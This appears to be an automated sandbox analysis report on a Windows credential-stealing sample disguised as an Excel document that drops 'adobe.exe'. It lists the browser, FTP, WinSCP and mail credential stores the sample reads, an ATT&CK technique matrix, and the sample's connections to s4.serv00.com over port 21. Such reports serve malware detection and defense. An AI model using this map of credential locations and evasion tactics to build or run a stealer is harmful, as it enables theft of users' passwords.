                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3dc9970.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.adobe.exe.3ec1420.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.adobe.exe.3efca40.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3e04f90.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3e04f90.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3dc9970.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.adobe.exe.3efca40.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.adobe.exe.3ec1420.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.4099572148.0000000002CBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4099468817.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1875942602.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1868550635.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4099468817.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1875942602.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1644979202.0000000003DC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4099572148.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1791642925.0000000003E39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PRE ALERT Docs_PONBOM01577.xlsx.exe PID: 4464, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PRE ALERT Docs_PONBOM01577.xlsx.exe PID: 7180, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 7444, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 7484, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 7828, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Yara matchFile source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3dc9970.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.adobe.exe.3ec1420.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.adobe.exe.3efca40.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3e04f90.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3e04f90.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3dc9970.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.adobe.exe.3efca40.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.adobe.exe.3ec1420.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.1875942602.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1868550635.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4099468817.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1644979202.0000000003DC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4099572148.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1791642925.0000000003E39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PRE ALERT Docs_PONBOM01577.xlsx.exe PID: 4464, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PRE ALERT Docs_PONBOM01577.xlsx.exe PID: 7180, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 7444, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 7484, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 7828, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3dc9970.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.adobe.exe.3ec1420.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.adobe.exe.3efca40.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3e04f90.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3e04f90.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3dc9970.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.adobe.exe.3efca40.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.adobe.exe.3ec1420.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.4099572148.0000000002CBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4099468817.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1875942602.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1868550635.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4099468817.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1875942602.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1644979202.0000000003DC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4099572148.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1791642925.0000000003E39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PRE ALERT Docs_PONBOM01577.xlsx.exe PID: 4464, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PRE ALERT Docs_PONBOM01577.xlsx.exe PID: 7180, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 7444, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 7484, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 7828, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Ingress Tool Transfer
                    1
                    Exfiltration Over Alternative Protocol
                    Abuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    Registry Run Keys / Startup Folder
                    112
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    21
                    Input Capture
                    24
                    System Information Discovery
                    Remote Desktop Protocol2
                    Data from Local System
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Registry Run Keys / Startup Folder
                    12
                    Obfuscated Files or Information
                    1
                    Credentials in Registry
                    1
                    Query Registry
                    SMB/Windows Admin Shares1
                    Email Collection
                    1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing
                    NTDS211
                    Security Software Discovery
                    Distributed Component Object Model21
                    Input Capture
                    2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets2
                    Process Discovery
                    SSH1
                    Clipboard Data
                    23
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                    Masquerading
                    Cached Domain Credentials141
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                    Virtualization/Sandbox Evasion
                    DCSync1
                    Application Window Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
                    Process Injection
                    Proc Filesystem1
                    System Network Configuration Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Hidden Files and Directories
                    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467356 Sample: PRE ALERT Docs_PONBOM01577.... Startdate: 04/07/2024 Architecture: WINDOWS Score: 100 32 s4.serv00.com 2->32 34 api.ipify.org 2->34 54 Snort IDS alert for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 14 other signatures 2->60 7 PRE ALERT Docs_PONBOM01577.xlsx.exe 3 2->7         started        11 adobe.exe 3 2->11         started        13 adobe.exe 2 2->13         started        signatures3 process4 file5 30 PRE ALERT Docs_PONBOM01577.xlsx.exe.log, ASCII 7->30 dropped 62 Injects a PE file into a foreign processes 7->62 15 PRE ALERT Docs_PONBOM01577.xlsx.exe 16 4 7->15         started        64 Antivirus detection for dropped file 11->64 66 Multi AV Scanner detection for dropped file 11->66 68 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 11->68 20 adobe.exe 14 2 11->20         started        22 adobe.exe 2 13->22         started        24 adobe.exe 13->24         started        signatures6 process7 dnsIp8 36 s4.serv00.com 213.189.52.181, 21, 49734, 49736 ECO-ATMAN-PLECO-ATMAN-PL Poland 15->36 38 api.ipify.org 172.67.74.152, 443, 49732, 49738 CLOUDFLARENETUS United States 15->38 26 C:\Users\user\AppData\Roaming\...\adobe.exe, PE32 15->26 dropped 28 C:\Users\user\...\adobe.exe:Zone.Identifier, ASCII 15->28 dropped 40 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->40 42 Tries to steal Mail credentials (via file / registry access) 15->42 44 Drops executable to a common third party application directory 15->44 46 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->46 48 Tries to harvest and steal ftp login credentials 22->48 50 Tries to harvest and steal browser information (history, passwords, etc) 22->50 52 Installs a global keyboard hook 22->52 file9 signatures10

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    PRE ALERT Docs_PONBOM01577.xlsx.exe24%ReversingLabs
                    PRE ALERT Docs_PONBOM01577.xlsx.exe30%VirustotalBrowse
                    PRE ALERT Docs_PONBOM01577.xlsx.exe100%AviraHEUR/AGEN.1309979
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\Adobe\adobe.exe100%AviraHEUR/AGEN.1309979
                    C:\Users\user\AppData\Roaming\Adobe\adobe.exe24%ReversingLabs
                    C:\Users\user\AppData\Roaming\Adobe\adobe.exe30%VirustotalBrowse
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    api.ipify.org0%VirustotalBrowse
                    s4.serv00.com0%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    https://api.ipify.org/0%URL Reputationsafe
                    https://api.ipify.org/0%URL Reputationsafe
                    http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
                    http://www.fontbureau.com0%URL Reputationsafe
                    http://www.fontbureau.com/designersG0%URL Reputationsafe
                    http://www.fontbureau.com/designers/?0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    http://www.fontbureau.com/designers?0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.fontbureau.com/designers0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    https://api.ipify.org/t0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    https://api.ipify.org0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.fontbureau.com/designers80%URL Reputationsafe
                    http://www.fontbureau.com/designers80%URL Reputationsafe
                    http://www.fonts.com0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://s4.serv00.com0%Avira URL Cloudsafe
                    http://s4.serv00.com0%VirustotalBrowse
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ipify.org
                    172.67.74.152
                    truefalseunknown
                    s4.serv00.com
                    213.189.52.181
                    truetrueunknown
                    NameMaliciousAntivirus DetectionReputation
                    https://api.ipify.org/false
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.apache.org/licenses/LICENSE-2.0PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.fontbureau.comPRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.fontbureau.com/designersGPRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.fontbureau.com/designers/?PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.founder.com.cn/cn/bThePRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://account.dyn.com/PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1644979202.0000000003DC9000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000003.00000002.1791642925.0000000003E39000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.1868550635.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.fontbureau.com/designers?PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.tiro.comPRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.fontbureau.com/designersPRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.goodfont.co.krPRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://api.ipify.org/tPRE ALERT Docs_PONBOM01577.xlsx.exe, 00000002.00000002.4099468817.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.1875942602.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4099572148.0000000002C4C000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.carterandcone.comlPRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.sajatypeworks.comPRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.typography.netDPRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.fontbureau.com/designers/cabarga.htmlNPRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.founder.com.cn/cn/cThePRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.galapagosdesign.com/staff/dennis.htmPRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
